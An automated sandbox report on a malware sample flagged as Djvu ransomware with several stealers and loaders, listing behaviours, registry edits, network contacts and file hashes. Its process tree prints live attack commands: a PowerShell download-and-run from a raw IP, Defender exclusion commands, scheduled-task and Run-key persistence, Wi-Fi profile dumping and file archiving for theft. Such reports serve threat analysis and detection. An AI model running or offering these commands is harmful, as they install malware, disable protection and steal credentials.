Analysis Overview
SHA256
8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
Threat Level: Known bad
The file 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d was found to be: Known bad.
Malicious Activity Summary
Amadey
Detected Djvu ransomware
ZGRat
Djvu Ransomware
DcRat
Vidar
Lumma Stealer
Detect ZGRat V1
Stealc
SmokeLoader
Detect Vidar Stealer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies file permissions
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Identifies Wine through registry keys
Deletes itself
Checks BIOS information in registry
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-15 01:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 01:10
Reported
2024-03-15 01:15
Platform
win7-20240221-en
Max time kernel
300s
Max time network
301s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\6375.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
SmokeLoader
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\6375.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" | C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\463A.exe | N/A |
| File created | C:\Windows\Tasks\explorgu.job | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\D55B.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3F18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\463A.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe
"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BCBA.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Users\Admin\AppData\Local\Temp\6375.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f6994695-3cd8-4f33-87d3-a992b1783b4e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\6375.exe
"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\6375.exe
"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1444
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"
C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\D55B.exe
C:\Users\Admin\AppData\Local\Temp\D55B.exe
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\D80A.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 124
C:\Users\Admin\AppData\Local\Temp\F31A.exe
C:\Users\Admin\AppData\Local\Temp\F31A.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {E17D5ECB-3BDA-44A1-9410-37913DE0A1EC} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\3F18.exe
C:\Users\Admin\AppData\Local\Temp\3F18.exe
C:\Users\Admin\AppData\Local\Temp\463A.exe
C:\Users\Admin\AppData\Local\Temp\463A.exe
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\650401615101_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 208
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| MX | 187.211.202.16:80 | sdfjhuz.com | tcp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| MX | 187.211.202.16:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| MX | 187.211.202.16:80 | sajdfue.com | tcp |
| MX | 187.211.202.16:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| DE | 5.75.208.156:80 | 5.75.208.156 | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| NL | 195.20.16.82:443 | tcp | |
| NL | 195.20.16.82:443 | tcp | |
| US | 8.8.8.8:53 | lknusantararaya.com | udp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| US | 8.8.8.8:53 | www.upload.ee | udp |
| FR | 51.91.30.159:443 | www.upload.ee | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| US | 8.8.8.8:53 | topgamecheats.dev | udp |
| BG | 93.123.39.96:443 | topgamecheats.dev | tcp |
| NL | 193.222.96.225:80 | 193.222.96.225 | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
Files
memory/2744-3-0x0000000000400000-0x0000000000474000-memory.dmp
memory/2744-2-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/2744-1-0x00000000002D0000-0x00000000003D0000-memory.dmp
memory/1216-4-0x0000000001C50000-0x0000000001C66000-memory.dmp
memory/2744-5-0x0000000000400000-0x0000000000474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BCBA.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
C:\Users\Admin\AppData\Local\Temp\6375.exe
| MD5 | ae597691370226cc4354b9897415b115 |
| SHA1 | 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae |
| SHA256 | 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675 |
| SHA512 | f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24 |
memory/328-26-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/328-27-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/328-28-0x0000000001E30000-0x0000000001F4B000-memory.dmp
memory/2600-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2600-33-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-36-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-37-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2600-58-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2392-61-0x0000000000570000-0x0000000000601000-memory.dmp
memory/2392-60-0x0000000000570000-0x0000000000601000-memory.dmp
memory/1820-68-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-69-0x0000000000400000-0x0000000000537000-memory.dmp
